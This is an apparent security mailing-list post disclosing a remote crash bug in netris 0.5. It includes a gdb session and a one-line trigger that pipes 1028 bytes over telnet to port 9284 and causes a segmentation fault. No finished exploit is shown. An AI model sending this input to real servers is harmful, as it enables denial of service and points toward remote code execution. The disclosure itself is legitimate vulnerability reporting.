netris-0.5.

[Artur Byszko / bajkero <bajkero () security hack pl>]

hi.

i found remote bug in latest version of netris(0.5)..

(apocalypse:~)% gdb netris
GNU gdb 4.18 (FreeBSD)
[..]
(gdb) r -w
Starting program: /usr/local/bin/netris -w
(no debugging symbols found)...(no debugging symbols found)...


***
on second terminal:
(apocalypse:~)% perl -e '{print "a"x"1028"}' | telnet localhost 9284
***

Your opponent is using an old, incompatible version
of Netris.  They should get the latest version.
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x28138fd5 in getenv () from /usr/lib/libc.so.4


exploit code is still under developing.. ;)

sorry for my terrible english.

best regards,
-- 
* Artur Byszko * \x62\x61\x6a\x6b\x65\x72\x6f *

Attachment: _bin
Description: